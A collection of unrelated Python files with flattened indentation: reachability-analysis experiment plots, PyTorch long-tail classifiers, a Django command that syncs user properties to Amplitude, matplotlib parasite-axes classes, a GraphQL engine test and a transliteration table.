mean_runtime = group['runtime'].mean()
std_runtime = group['runtime'].std()
runtime_str = "${:.3f} \pm {:.3f}$".format(mean_runtime, std_runtime)
final_step_error = group['final_step_error'].mean()
# Add the entries to the table for that prop/part
row = []
row.append(name)
row.append(runtime_str)
row.append(round(final_step_error))
rows.append(row)
# print as a human-readable table and as a latex table
print(tabulate(rows, headers='firstrow'))
print()
print(tabulate(rows, headers='firstrow', tablefmt='latex_raw'))
def plot_error_vs_timestep(self):
grouped, filename = self.grab_latest_groups()
fig, ax = plt.subplots(1, 1)
# Go through each combination of prop/part we want in the table
for propagator in ['SDP', 'CROWN']:
for partitioner in ['None', 'Uniform']:
prop_part_tuple = (propagator, partitioner)
try:
group = grouped.get_group(prop_part_tuple)
except KeyError:
continue
all_errors = group['all_errors'].iloc[0]
t_max = all_errors.shape[0]
label = self.info[prop_part_tuple]['name']
# replace citation with the ref number in this plot
label = label.replace('~\\cite{hu2020reach}', ' [22]')
plt.plot(
np.arange(1, t_max+1),
all_errors,
color=self.info[prop_part_tuple]['color'],
ls=self.info[prop_part_tuple]['ls'],
label=label,
)
plt.legend()
ax.set_yscale('log')
plt.xlabel('Time Steps')
plt.ylabel('Approximation Error')
plt.tight_layout()
# Save plot with similar name to pkl file that contains data
fig_filename = filename.replace('table', 'timestep').replace('pkl', 'png')
plt.savefig(fig_filename)
# plt.show()
def plot_reachable_sets(self):
grouped, filename = self.grab_latest_groups()
dyn = dynamics.DoubleIntegrator()
controller = load_controller(name="double_integrator")
init_state_range = np.array(
[ # (num_inputs, 2)
[2.5, 3.0], # x0min, x0max
[-0.25, 0.25], # x1min, x1max
]
)
partitioner_hyperparams = {
"type": "None",
}
propagator_hyperparams = {
"type": "CROWN",
"input_shape": init_state_range.shape[:-1],
}
# Set up analyzer (+ parititoner + propagator)
analyzer = analyzers.ClosedLoopAnalyzer(controller, dyn)
analyzer.partitioner = partitioner_hyperparams
analyzer.propagator = propagator_hyperparams
input_constraint = constraints.LpConstraint(
range=init_state_range, p=np.inf
)
inputs_to_highlight = [
{"dim": [0], "name": "$\mathbf{x}_0$"},
{"dim": [1], "name": "$\mathbf{x}_1$"},
]
t_max = 5
analyzer.partitioner.setup_visualization(
input_constraint,
t_max,
analyzer.propagator,
show_samples=True,
inputs_to_highlight=inputs_to_highlight,
aspect="auto",
initial_set_color=analyzer.initial_set_color,
initial_set_zorder=analyzer.initial_set_zorder,
sample_zorder=analyzer.sample_zorder
)
analyzer.partitioner.linewidth = 1
# Go through each combination of prop/part we want in the table
for propagator in ['SDP', 'CROWN']:
for partitioner in ['None', 'Uniform']:
prop_part_tuple = (propagator, partitioner)
try:
group = grouped.get_group(prop_part_tuple)
except KeyError:
continue
output_constraint = group['output_constraint'].iloc[0]
analyzer.partitioner.visualize(
[],
[],
output_constraint,
None,
reachable_set_color=self.info[prop_part_tuple]['color'],
reachable_set_ls=self.info[prop_part_tuple]['ls'],
reachable_set_zorder=analyzer.reachable_set_zorder
)
analyzer.partitioner.default_patches = analyzer.partitioner.animate_axes.patches.copy()
analyzer.partitioner.default_lines = analyzer.partitioner.animate_axes.lines.copy()
# Add shaded regions for verification
goal_arr = np.array([
[-0.5, 0.5],
[-0.25, 0.25],
])
dims = analyzer.partitioner.input_dims
color = "None"
fc_color = "lightblue"
linewidth = 1
ls = '-'
rect = constraints.make_rect_from_arr(goal_arr, dims, color, linewidth, fc_color, ls, zorder=0)
analyzer.partitioner.animate_axes.add_patch(rect)
avoid_arr = np.array([
analyzer.partitioner.animate_axes.get_xlim(),
[0.35, analyzer.partitioner.animate_axes.get_ylim()[1]],
])
dims = analyzer.partitioner.input_dims
color = "None"
fc_color = "wheat"
linewidth = 1
ls = '-'
rect = constraints.make_rect_from_arr(avoid_arr, dims, color, linewidth, fc_color, ls, zorder=0)
analyzer.partitioner.animate_axes.add_patch(rect)
plt.tight_layout()
# Save plot with similar name to pkl file that contains data
fig_filename = filename.replace('table', 'reachable').replace('pkl', 'png')
plt.savefig(fig_filename)
# plt.show()
class CompareLPvsCF(Experiment):
def __init__(self, system):
self.system = system
Experiment.__init__(self)
def run(self):
rows = []
rows.append(["", "1", "4", "16"])
propagator_names = {"CROWNLP": "L.P.", "CROWN": "C.F."}
t_max = {"quadrotor": 2, "double_integrator": 5}
partitions = {
'quadrotor': ["[1,1,1,1,1,1]", "[2,2,1,1,1,1]", "[2,2,2,2,1,1]"],
'double_integrator': ["[1,1]", "[2,2]", "[4,4]"]
}
parser = ex.setup_parser()
for propagator in ["CROWNLP", "CROWN"]:
row = [propagator_names[propagator]]
for num_partitions in partitions[self.system]:
args = parser.parse_args()
args.partitioner = "Uniform"
args.propagator = propagator
args.system = self.system
args.state_feedback = True
args.t_max = t_max[self.system]
args.num_partitions = num_partitions
args.estimate_runtime = True
stats, info = ex.main(args)
mean_runtime = stats['runtimes'].mean()
std_runtime = stats['runtimes'].std()
runtime_str = "${:.3f} \pm {:.3f}$".format(mean_runtime, std_runtime)
row.append(runtime_str)
rows.append(row)
self.data = rows
def plot(self):
if hasattr(self, "data"):
rows = self.data
else:
# Grab from specific pkl file
raise NotImplementedError
print(tabulate(rows, headers='firstrow'))
print()
print(tabulate(rows, headers='firstrow', tablefmt='latex_raw'))
class NxScalability(Experiment):
def __init__(self, state_or_control="state"):
self.filename = results_dir + 'runtime_vs_num_{x_or_u}_{dt}_table.pkl'
self.state_or_control = state_or_control
Experiment.__init__(self)
def run(self):
dt = datetime.datetime.now().strftime('%Y_%m_%d__%H_%M_%S')
parser = ex.setup_parser()
args = parser.parse_args()
args.save_plot = False
args.show_plot = False
args.make_animation = False
args.show_animation = False
# args.init_state_range = "[[2.5, 3.0], [-0.25, 0.25]]"
args.state_feedback = True
args.boundaries = "lp"
args.system = "unity"
args.t_max = 5
args.estimate_runtime = True
expts = [
{
'partitioner': 'None',
'propagator': 'CROWN',
},
# {
# 'partitioner': 'None',
# 'propagator': 'SDP',
# 'cvxpy_solver': 'MOSEK',
# },
]
nxs = [2, 3, 4, 10, 20, 30, 50, 100]
df = pd.DataFrame()
for nx in nxs:
for expt in expts:
for key, value in expt.items():
setattr(args, key, value)
if self.state_or_control == "state":
args.nx = nx
elif self.state_or_control == "control":
args.nu = nx
stats, info = ex.main(args)
for i, runtime in enumerate(stats['runtimes']):
df = df.append({
**expt,
'run': i,
'runtime': runtime,
'final_step_error': stats['final_step_errors'][i],
'avg_error': stats['avg_errors'][i],
'output_constraint': stats['output_constraints'][i],
'all_errors': stats['all_errors'][i],
'nx': nx,
}, ignore_index=True)
df.to_pickle(self.filename.format(x_or_u=self.state_or_control, dt=dt))
def plot(self):
# Grab latest file as pandas dataframe
list_of_files = glob.glob(self.filename.format(x_or_u=self.state_or_control, dt='*'))
latest_filename = max(list_of_files, key=os.path.getctime)
df = pd.read_pickle(latest_filename)
runtime_mean_series = df.groupby(['propagator', 'nx']).runtime.mean().unstack()
runtime_std_series = df.groupby(['propagator', 'nx']).runtime.std().unstack()
plt.clf()
color = 'tab:green'
plt.plot(runtime_mean_series.columns.to_numpy(), runtime_mean_series.iloc[0].to_numpy(), color=color)
plt.gca().fill_between(runtime_mean_series.columns.to_numpy(), runtime_mean_series.iloc[0].to_numpy()-runtime_std_series.iloc[0].to_numpy(), runtime_mean_series.iloc[0].to_numpy(), alpha=0.2, color=color)
plt.gca().fill_between(runtime_mean_series.columns.to_numpy(), runtime_mean_series.iloc[0].to_numpy(), runtime_mean_series.iloc[0].to_numpy()+runtime_std_series.iloc[0].to_numpy(), alpha=0.2, color=color)
if self.state_or_control == "state":
plt.xlabel('Number of States, $n_x$')
elif self.state_or_control == "control":
plt.xlabel('Number of Control Inputs, $n_u$')
plt.ylabel('Computation Time [s]')
plt.tight_layout()
# Save plot with similar name to pkl file that contains data
filename = latest_filename
fig_filename = filename.replace('table', 'runtime_'+self.state_or_control).replace('pkl', 'png')
plt.savefig(fig_filename)
if __name__ == '__main__':
# Like Fig 3 in ICRA21 paper
c = CompareRuntimeVsErrorTable()
c.run()
c.plot() # 3A: table
c.plot_reachable_sets() # 3B: overlay reachable sets
c.plot_error_vs_timestep() # 3C: error vs timestep
# c = CompareLPvsCF(system="double_integrator")
# c.run()
# c.plot()
# c = CompareLPvsCF(system="quadrotor")
# c.run()
# c.plot()
# See how runtime scales with number of states
# c = NxScalability("state")
# c.run()
# c.plot()
# See how runtime scales with number of control inputs
# c = NxScalability("control")
# c.run()
# c.plot()
# WIP...
# c = CompareMultipleCombos()
# c.run()
# c.plot()
|
11520833
|
import torch
import torch.nn as nn
from torch.autograd.function import Function
import torch.nn.functional as F
from torch.nn import Parameter
import numpy as np
import os
import math
import pdb
import time
import copy
import mmcv
from sklearn.cluster import KMeans
# This file contains implementations of some algorithms not reported in the paper,
# which we think could be of close relationship to the task.
# Since they have not been double checked or cleaned up, feel free to contact
# us should you have any questions.
class BN_Classifier(nn.Module):
def __init__(self, num_classes=10, in_dim=640, samples_per_cls=None, norm=True,
use_tracked_mean=True, use_tracked_var=True, use_relu=True,
bn_names=('CLEAN', 'PGD-5', 'PGD-10', 'PGD-20'),
bn_per_cls=False):
super(BN_Classifier, self).__init__()
self.num_classes = num_classes
self.samples_per_cls = samples_per_cls
self.in_dim = in_dim
self.fc = nn.Linear(in_dim, num_classes)
self.bn1 = nn.BatchNorm2d(in_dim)
self.relu = nn.ReLU(inplace=True)
self.norm = norm
self.use_relu = use_relu
self.use_tracked_mean = use_tracked_mean
self.use_tracked_var = use_tracked_var
self.bn_per_cls = bn_per_cls
self.bn_names = bn_names
self.bn_pool = {}
self.init_bn_pool()
def init_bn_pool(self):
if self.bn_per_cls:
self.bn_running_means = nn.Parameter(torch.zeros(len(self.bn_names), self.num_classes, self.in_dim), requires_grad=False).cuda()
self.bn_running_vars = nn.Parameter(torch.ones(len(self.bn_names), self.num_classes, self.in_dim), requires_grad=False).cuda()
for idx, name in enumerate(self.bn_names):
self.bn_pool.update(
{name: [nn.BatchNorm2d(self.in_dim).cuda() for _ in range(self.num_classes)]}
)
for i in range(self.num_classes):
self.bn_running_means[idx][i] = self.bn_pool[name][i].running_mean
self.bn_running_vars[idx][i] = self.bn_pool[name][i].running_var
else:
self.bn_running_means = nn.Parameter(torch.zeros(len(self.bn_names), self.in_dim), requires_grad=False).cuda()
self.bn_running_vars = nn.Parameter(torch.ones(len(self.bn_names), self.in_dim), requires_grad=False).cuda()
for idx, name in enumerate(self.bn_names):
self.bn_pool.update(
{name: nn.BatchNorm2d(self.in_dim).cuda()}
)
self.bn_running_means[idx] = self.bn_pool[name].running_mean
self.bn_running_vars[idx] = self.bn_pool[name].running_var
# self.name2idx = dict()
# for idx, name in enumerate(self.bn_names):
# self.name2idx.update({name: idx})
def fine_bn(self, inputs, targets, name):
if self.bn_per_cls:
for i in range(self.num_classes):
self.bn_pool[name][i](inputs[targets == i])
else:
self.bn_pool[name](inputs)
return
def forward(self, inputs, targets=None, name=None):
# separate bn
if name is not None and self.training:
self.fine_bn(inputs, targets, name)
# overall bn
out = self.bn1(inputs)
if self.use_relu:
out = self.relu(out)
out = F.avg_pool2d(out, 8)
out = out.view(-1, self.in_dim)
out = self.fc(out)
return out
def on_epoch(self):
if self.bn_per_cls:
for idx, name in enumerate(self.bn_names):
for i in range(self.num_classes):
self.bn_running_means[idx][i] = self.bn_pool[name][i].running_mean
self.bn_running_vars[idx][i] = self.bn_pool[name][i].running_var
else:
for idx, name in enumerate(self.bn_names):
self.bn_running_means[idx] = self.bn_pool[name].running_mean
self.bn_running_vars[idx] = self.bn_pool[name].running_var
class Mix_Classifier(nn.Module):
def __init__(self, num_classes=10, in_dim=640, samples_per_cls=None,
norm=True, alpha=1.0, noise_alpha=0.2, beta=0.9999):
super(Mix_Classifier, self).__init__()
self.num_classes = num_classes
self.alpha = alpha
self.noise_alpha = noise_alpha
self.samples_per_cls = torch.tensor(samples_per_cls).cuda()
self.fc = nn.Linear(in_dim, num_classes)
self.in_dim = in_dim
self.norm = norm
effective_num = 1.0 - np.power(beta, samples_per_cls)
self.effective_num = torch.tensor(effective_num).float().unsqueeze(0).cuda()
weights = (1.0 - beta) / np.array(effective_num)
weights = weights / np.sum(weights) * num_classes
self.weights = torch.tensor(weights).float().unsqueeze(0).cuda()
print(self.weights)
def mixup_data(self, x, y):
'''Returns mixed inputs, pairs of targets, and lambda'''
batch_size = x.shape[0]
if self.alpha > 0:
lam = torch.rand(batch_size,1,1,1).cuda()
else:
lam = 1
lam = 1. - self.noise_alpha * (1 - lam) # lam itself is the bigger one
batch_size = x.size()[0]
index = torch.randperm(batch_size).cuda()
y_a = y
y_b = y[index]
# lam = torch.where(self.samples_per_cls[y_a] > self.samples_per_cls[y_b], lam, 1-lam)
# lam = torch.where(self.samples_per_cls[y_a] == self.samples_per_cls[y_b], lam, lam/self.noise_alpha)
lam = lam.view(-1,1,1,1)
mixed_x = lam * x + (1 - lam) * x[index, :]
lam = 1 - (1 - lam.view(-1)) * self.weights.squeeze()[y_b]
return mixed_x, y_a, y_b, lam
def mixup_criterion(self, pred, y_a, y_b, lam):
loss = lam * nn.CrossEntropyLoss()(pred, y_a) + (1 - lam) * nn.CrossEntropyLoss()(pred, y_b)
return loss.mean()
def forward (self, inputs, **kwargs):
outputs = self.fc(inputs)
return outputs
def loss(self, logits, targets_a, targets_b, lam):
loss = self.mixup_criterion(logits, targets_a, targets_b, lam)
return loss
class MC_Classifier(nn.Module):
def __init__(self, num_classes=10, in_dim=640, samples_per_cls=None,
num_centroids=2, norm=True):
super(MC_Classifier, self).__init__()
self.num_classes = num_classes
self.num_centroids = num_centroids
self.samples_per_cls = samples_per_cls
self.fc = nn.Linear(in_dim, num_classes)
self.in_dim = in_dim
self.norm = norm
self.feature_bank = [[] for _ in range(self.num_classes)]
self.centroids = torch.zeros((num_classes, num_centroids, in_dim))
print(self.fc.weight.type)
def forward (self, inputs, **kwargs):
x = self.fc(inputs)
self.batch_features = inputs
return x
def adv_loss(self, inputs, labels):
logits = torch.matmul(inputs, self.centroids_classifier.t()) # (batch_size, self.num_classes*self.num_centroids)
if self.norm:
inputs_norm = inputs.norm(dim=-1, p=2, keepdim=True)
centroids_norm = self.centroids_classifier.norm(dim=-1, p=2, keepdim=True)
logits = logits / inputs_norm / centroids_norm.t()
logits = logits.view(inputs.shape[0], self.num_classes, self.num_centroids)
max_logits = torch.max(logits, dim=-1)
min_logits = torch.min(logits, dim=-1)
index = torch.zeros_like(max_logits[0], dtype=torch.uint8)
index.scatter_(1, labels.data.view(-1, 1), 1)
output = torch.where(index, min_logits[0], max_logits[0])
# output = torch.mean(logits, dim=-1)
adv_loss = F.cross_entropy(output, labels)
return adv_loss
def on_epoch(self):
# update feature centroids
for cla, features in enumerate(self.feature_bank):
# fixme: if we use distributed training, the features would be stored on different divices
assert len(features) > 0
features = np.asarray(features)
if features.shape[0] < self.num_centroids:
for i in range(self.num_centroids):
feat_tensor = torch.tensor(features)
self.centroids[cla][i] = torch.mean(feat_tensor, dim=0)
else:
kmeans = KMeans(n_clusters=self.num_centroids, random_state=0).fit(features)
for i in range(self.num_centroids):
feat_tensor = torch.tensor(features[kmeans.labels_==i])
self.centroids[cla][i] = torch.mean(feat_tensor, dim=0)
self.centroids_classifier = self.centroids.view(self.num_classes*self.num_centroids, -1).cuda()
# update classifier weight with centroids
# gamma = 0.1
# update_classifier = torch.nn.Parameter(self.centroids.mean(dim=1).clone().detach(), requires_grad=True).cuda()
# self.fc.weight = (self.fc.weight + gamma * self.centroids.mean(dim=1).clone().detach().cuda()) / (1 + gamma)
self.feature_bank = [[] for _ in range(self.num_classes)]
print('>>> update centroids by feature back')
return
def update_feature_bank(self, inputs, labels):
for feature, label in zip(inputs, labels):
self.feature_bank[label].append(feature.clone().detach().cpu().numpy())
# for i in range(self.num_classes):
# print(len(self.feature_bank[i]), end=' ')
# print()
def loss(self, logits, labels):
# todo: more compact
loss = F.cross_entropy(logits, labels)
return loss
if __name__ == '__main__':
num_classes = 3
samples_per_cls = [4,6,8]
in_dim = 5
batch_size = 6
data = torch.randn([batch_size, in_dim, 14, 14])
labels = torch.tensor([0,1,1,2,2,2], dtype=torch.int64)
bn = BN_Classifier(num_classes, in_dim, samples_per_cls, bn_per_cls=True)
bn(data, labels, 'CLEAN')
num_centroids = 2
mc = MC_Classifier(num_classes, in_dim, samples_per_cls, num_centroids)
for i, spc in enumerate(samples_per_cls):
for _ in range(spc):
mc.feature_bank[i].append(torch.randn(in_dim).numpy())
mc.on_epoch()
# mc.centroids = torch.randn(num_classes, num_centroids, in_dim)
feat_inputs = torch.randn(batch_size, in_dim)
labels = torch.tensor([0,1,1,2,2,2], dtype=torch.int64)
mc.adv_loss(feat_inputs, labels)
|
11520865
|
import requests
import json
from django.core.management.base import BaseCommand
from user.models import User
from researchhub.settings import AMPLITUDE_API_KEY
API_URL = 'https://api.amplitude.com/2/httpapi'
class Command(BaseCommand):
def get_user_props(self, user, user_email):
# Makes one less db call if user email is passed in
user_properties = {
'is_suspended': user.is_suspended,
'probable_spammer': user.probable_spammer
}
return user_properties
def forward_amp_event(self, events):
event_data = {
'api_key': AMPLITUDE_API_KEY,
'events': events
}
data = json.dumps(event_data)
headers = {
'Content-Type': 'application/json',
'Accept': '*/*'
}
request = requests.post(
API_URL,
data=data,
headers=headers
)
res = request.json()
if request.status_code != 200:
res = request.json()
print(res)
print(res)
def update_users(self, users):
print('Users')
count = users.count()
events = []
for i, user in enumerate(users.iterator()):
if (i % 1000 == 0 and i != 0) or (count - 1) == i:
self.forward_amp_event(events)
events = []
else:
print(f'{i}/{count}')
user_email = user.email
user_properties = self.get_user_props(user, user_email)
user_id = f'{user_email}_{user.id}'
if len(user_id) < 5:
user_id += '_____'
hit = {
'user_id': user_id,
'event_type': 'update_user',
'user_properties': user_properties,
}
events.append(hit)
def handle(self, *args, **options):
user = User.objects
self.update_users(user)
|
11520893
|
import functools
from matplotlib import artist as martist, cbook, transforms as mtransforms
from matplotlib.axes import subplot_class_factory
from matplotlib.transforms import Bbox
from .mpl_axes import Axes
import numpy as np
class ParasiteAxesBase:
def get_images_artists(self):
artists = {a for a in self.get_children() if a.get_visible()}
images = {a for a in self.images if a.get_visible()}
return list(images), list(artists - images)
def __init__(self, parent_axes, **kwargs):
self._parent_axes = parent_axes
kwargs["frameon"] = False
super().__init__(parent_axes.figure, parent_axes._position, **kwargs)
def cla(self):
super().cla()
martist.setp(self.get_children(), visible=False)
self._get_lines = self._parent_axes._get_lines
# In mpl's Axes, zorders of x- and y-axis are originally set
# within Axes.draw().
if self._axisbelow:
self.xaxis.set_zorder(0.5)
self.yaxis.set_zorder(0.5)
else:
self.xaxis.set_zorder(2.5)
self.yaxis.set_zorder(2.5)
def pick(self, mouseevent):
# This most likely goes to Artist.pick (depending on axes_class given
# to the factory), which only handles pick events registered on the
# axes associated with each child:
super().pick(mouseevent)
# But parasite axes are additionally given pick events from their host
# axes (cf. HostAxesBase.pick), which we handle here:
for a in self.get_children():
if (hasattr(mouseevent.inaxes, "parasites")
and self in mouseevent.inaxes.parasites):
a.pick(mouseevent)
@functools.lru_cache(None)
def parasite_axes_class_factory(axes_class=None):
if axes_class is None:
cbook.warn_deprecated(
"3.3", message="Support for passing None to "
"parasite_axes_class_factory is deprecated since %(since)s and "
"will be removed %(removal)s; explicitly pass the default Axes "
"class instead.")
axes_class = Axes
return type("%sParasite" % axes_class.__name__,
(ParasiteAxesBase, axes_class), {})
ParasiteAxes = parasite_axes_class_factory(Axes)
class ParasiteAxesAuxTransBase:
def __init__(self, parent_axes, aux_transform, viewlim_mode=None,
**kwargs):
self.transAux = aux_transform
self.set_viewlim_mode(viewlim_mode)
super().__init__(parent_axes, **kwargs)
def _set_lim_and_transforms(self):
self.transAxes = self._parent_axes.transAxes
self.transData = \
self.transAux + \
self._parent_axes.transData
self._xaxis_transform = mtransforms.blended_transform_factory(
self.transData, self.transAxes)
self._yaxis_transform = mtransforms.blended_transform_factory(
self.transAxes, self.transData)
def set_viewlim_mode(self, mode):
cbook._check_in_list([None, "equal", "transform"], mode=mode)
self._viewlim_mode = mode
def get_viewlim_mode(self):
return self._viewlim_mode
def update_viewlim(self):
viewlim = self._parent_axes.viewLim.frozen()
mode = self.get_viewlim_mode()
if mode is None:
pass
elif mode == "equal":
self.axes.viewLim.set(viewlim)
elif mode == "transform":
self.axes.viewLim.set(
viewlim.transformed(self.transAux.inverted()))
else:
cbook._check_in_list([None, "equal", "transform"], mode=mode)
def _pcolor(self, super_pcolor, *XYC, **kwargs):
if len(XYC) == 1:
C = XYC[0]
ny, nx = C.shape
gx = np.arange(-0.5, nx)
gy = np.arange(-0.5, ny)
X, Y = np.meshgrid(gx, gy)
else:
X, Y, C = XYC
if "transform" in kwargs:
mesh = super_pcolor(X, Y, C, **kwargs)
else:
orig_shape = X.shape
xyt = np.column_stack([X.flat, Y.flat])
wxy = self.transAux.transform(xyt)
gx = wxy[:, 0].reshape(orig_shape)
gy = wxy[:, 1].reshape(orig_shape)
mesh = super_pcolor(gx, gy, C, **kwargs)
mesh.set_transform(self._parent_axes.transData)
return mesh
def pcolormesh(self, *XYC, **kwargs):
return self._pcolor(super().pcolormesh, *XYC, **kwargs)
def pcolor(self, *XYC, **kwargs):
return self._pcolor(super().pcolor, *XYC, **kwargs)
def _contour(self, super_contour, *XYCL, **kwargs):
if len(XYCL) <= 2:
C = XYCL[0]
ny, nx = C.shape
gx = np.arange(0., nx)
gy = np.arange(0., ny)
X, Y = np.meshgrid(gx, gy)
CL = XYCL
else:
X, Y = XYCL[:2]
CL = XYCL[2:]
if "transform" in kwargs:
cont = super_contour(X, Y, *CL, **kwargs)
else:
orig_shape = X.shape
xyt = np.column_stack([X.flat, Y.flat])
wxy = self.transAux.transform(xyt)
gx = wxy[:, 0].reshape(orig_shape)
gy = wxy[:, 1].reshape(orig_shape)
cont = super_contour(gx, gy, *CL, **kwargs)
for c in cont.collections:
c.set_transform(self._parent_axes.transData)
return cont
def contour(self, *XYCL, **kwargs):
return self._contour(super().contour, *XYCL, **kwargs)
def contourf(self, *XYCL, **kwargs):
return self._contour(super().contourf, *XYCL, **kwargs)
def apply_aspect(self, position=None):
self.update_viewlim()
super().apply_aspect()
@functools.lru_cache(None)
def parasite_axes_auxtrans_class_factory(axes_class=None):
if axes_class is None:
cbook.warn_deprecated(
"3.3", message="Support for passing None to "
"parasite_axes_auxtrans_class_factory is deprecated since "
"%(since)s and will be removed %(removal)s; explicitly pass the "
"default ParasiteAxes class instead.")
parasite_axes_class = ParasiteAxes
elif not issubclass(axes_class, ParasiteAxesBase):
parasite_axes_class = parasite_axes_class_factory(axes_class)
else:
parasite_axes_class = axes_class
return type("%sParasiteAuxTrans" % parasite_axes_class.__name__,
(ParasiteAxesAuxTransBase, parasite_axes_class),
{'name': 'parasite_axes'})
ParasiteAxesAuxTrans = parasite_axes_auxtrans_class_factory(ParasiteAxes)
class HostAxesBase:
def __init__(self, *args, **kwargs):
self.parasites = []
super().__init__(*args, **kwargs)
def get_aux_axes(self, tr, viewlim_mode="equal", axes_class=ParasiteAxes):
parasite_axes_class = parasite_axes_auxtrans_class_factory(axes_class)
ax2 = parasite_axes_class(self, tr, viewlim_mode)
# note that ax2.transData == tr + ax1.transData
# Anything you draw in ax2 will match the ticks and grids of ax1.
self.parasites.append(ax2)
ax2._remove_method = self.parasites.remove
return ax2
def _get_legend_handles(self, legend_handler_map=None):
all_handles = super()._get_legend_handles()
for ax in self.parasites:
all_handles.extend(ax._get_legend_handles(legend_handler_map))
return all_handles
def draw(self, renderer):
orig_artists = list(self.artists)
orig_images = list(self.images)
if hasattr(self, "get_axes_locator"):
locator = self.get_axes_locator()
if locator:
pos = locator(self, renderer)
self.set_position(pos, which="active")
self.apply_aspect(pos)
else:
self.apply_aspect()
else:
self.apply_aspect()
rect = self.get_position()
for ax in self.parasites:
ax.apply_aspect(rect)
images, artists = ax.get_images_artists()
self.images.extend(images)
self.artists.extend(artists)
super().draw(renderer)
self.artists = orig_artists
self.images = orig_images
def cla(self):
for ax in self.parasites:
ax.cla()
super().cla()
def pick(self, mouseevent):
super().pick(mouseevent)
# Also pass pick events on to parasite axes and, in turn, their
# children (cf. ParasiteAxesBase.pick)
for a in self.parasites:
a.pick(mouseevent)
def twinx(self, axes_class=None):
"""
Create a twin of Axes with a shared x-axis but independent y-axis.
The y-axis of self will have ticks on the left and the returned axes
will have ticks on the right.
"""
if axes_class is None:
axes_class = self._get_base_axes()
parasite_axes_class = parasite_axes_class_factory(axes_class)
ax2 = parasite_axes_class(self, sharex=self, frameon=False)
self.parasites.append(ax2)
ax2._remove_method = self._remove_twinx
self.axis["right"].set_visible(False)
ax2.axis["right"].set_visible(True)
ax2.axis["left", "top", "bottom"].set_visible(False)
return ax2
def _remove_twinx(self, ax):
self.parasites.remove(ax)
self.axis["right"].set_visible(True)
self.axis["right"].toggle(ticklabels=False, label=False)
def twiny(self, axes_class=None):
"""
Create a twin of Axes with a shared y-axis but independent x-axis.
The x-axis of self will have ticks on the bottom and the returned axes
will have ticks on the top.
"""
if axes_class is None:
axes_class = self._get_base_axes()
parasite_axes_class = parasite_axes_class_factory(axes_class)
ax2 = parasite_axes_class(self, sharey=self, frameon=False)
self.parasites.append(ax2)
ax2._remove_method = self._remove_twiny
self.axis["top"].set_visible(False)
ax2.axis["top"].set_visible(True)
ax2.axis["left", "right", "bottom"].set_visible(False)
return ax2
def _remove_twiny(self, ax):
self.parasites.remove(ax)
self.axis["top"].set_visible(True)
self.axis["top"].toggle(ticklabels=False, label=False)
def twin(self, aux_trans=None, axes_class=None):
"""
Create a twin of Axes with no shared axis.
While self will have ticks on the left and bottom axis, the returned
axes will have ticks on the top and right axis.
"""
if axes_class is None:
axes_class = self._get_base_axes()
parasite_axes_auxtrans_class = \
parasite_axes_auxtrans_class_factory(axes_class)
if aux_trans is None:
ax2 = parasite_axes_auxtrans_class(
self, mtransforms.IdentityTransform(), viewlim_mode="equal")
else:
ax2 = parasite_axes_auxtrans_class(
self, aux_trans, viewlim_mode="transform")
self.parasites.append(ax2)
ax2._remove_method = self.parasites.remove
self.axis["top", "right"].set_visible(False)
ax2.axis["top", "right"].set_visible(True)
ax2.axis["left", "bottom"].set_visible(False)
def _remove_method(h):
self.parasites.remove(h)
self.axis["top", "right"].set_visible(True)
self.axis["top", "right"].toggle(ticklabels=False, label=False)
ax2._remove_method = _remove_method
return ax2
def get_tightbbox(self, renderer, call_axes_locator=True,
bbox_extra_artists=None):
bbs = [
*[ax.get_tightbbox(renderer, call_axes_locator=call_axes_locator)
for ax in self.parasites],
super().get_tightbbox(renderer,
call_axes_locator=call_axes_locator,
bbox_extra_artists=bbox_extra_artists)]
return Bbox.union([b for b in bbs if b.width != 0 or b.height != 0])
@functools.lru_cache(None)
def host_axes_class_factory(axes_class=None):
if axes_class is None:
cbook.warn_deprecated(
"3.3", message="Support for passing None to host_axes_class is "
"deprecated since %(since)s and will be removed %(removed)s; "
"explicitly pass the default Axes class instead.")
axes_class = Axes
def _get_base_axes(self):
return axes_class
return type("%sHostAxes" % axes_class.__name__,
(HostAxesBase, axes_class),
{'_get_base_axes': _get_base_axes})
def host_subplot_class_factory(axes_class):
host_axes_class = host_axes_class_factory(axes_class)
subplot_host_class = subplot_class_factory(host_axes_class)
return subplot_host_class
HostAxes = host_axes_class_factory(Axes)
SubplotHost = subplot_class_factory(HostAxes)
def host_axes(*args, axes_class=Axes, figure=None, **kwargs):
"""
Create axes that can act as a hosts to parasitic axes.
Parameters
----------
figure : `matplotlib.figure.Figure`
Figure to which the axes will be added. Defaults to the current figure
`.pyplot.gcf()`.
*args, **kwargs
Will be passed on to the underlying ``Axes`` object creation.
"""
import matplotlib.pyplot as plt
host_axes_class = host_axes_class_factory(axes_class)
if figure is None:
figure = plt.gcf()
ax = host_axes_class(figure, *args, **kwargs)
figure.add_axes(ax)
plt.draw_if_interactive()
return ax
def host_subplot(*args, axes_class=Axes, figure=None, **kwargs):
"""
Create a subplot that can act as a host to parasitic axes.
Parameters
----------
figure : `matplotlib.figure.Figure`
Figure to which the subplot will be added. Defaults to the current
figure `.pyplot.gcf()`.
*args, **kwargs
Will be passed on to the underlying ``Axes`` object creation.
"""
import matplotlib.pyplot as plt
host_subplot_class = host_subplot_class_factory(axes_class)
if figure is None:
figure = plt.gcf()
ax = host_subplot_class(figure, *args, **kwargs)
figure.add_subplot(ax)
plt.draw_if_interactive()
return ax
|
11520906
|
import pytest
from tartiflette import Resolver, create_engine
_SDL = """
type A {
b: String
c: String
}
type Query {
a: A
}
"""
@pytest.mark.asyncio
async def test_issue140():
@Resolver("Query.a", schema_name="test_issue140")
async def resolver_query_a(*args, **kwargs):
return {"b": "mpm", "c": "ppp"}
eng = await create_engine(
_SDL,
schema_name="test_issue140",
modules=[
"tests.functional.test_engine_modules",
"tests.functional.test_engine_modules.non_init_resolver",
],
)
assert await eng.execute("""query { a { b c } }""") == {
"data": {"a": {"b": "A.b", "c": "A.c"}}
}
@pytest.mark.asyncio
async def test_issue140_except():
with pytest.raises(ImportError):
await create_engine("""a""", modules=["unkn.nown.modules"])
|
11520936
|
data = (
'Yu ', # 0x00
'Cui ', # 0x01
'Ya ', # 0x02
'Zhu ', # 0x03
'Cu ', # 0x04
'Dan ', # 0x05
'Shen ', # 0x06
'Zhung ', # 0x07
'Ji ', # 0x08
'Yu ', # 0x09
'Hou ', # 0x0a
'Feng ', # 0x0b
'La ', # 0x0c
'Yang ', # 0x0d
'Shen ', # 0x0e
'Tu ', # 0x0f
'Yu ', # 0x10
'Gua ', # 0x11
'Wen ', # 0x12
'Huan ', # 0x13
'Ku ', # 0x14
'Jia ', # 0x15
'Yin ', # 0x16
'Yi ', # 0x17
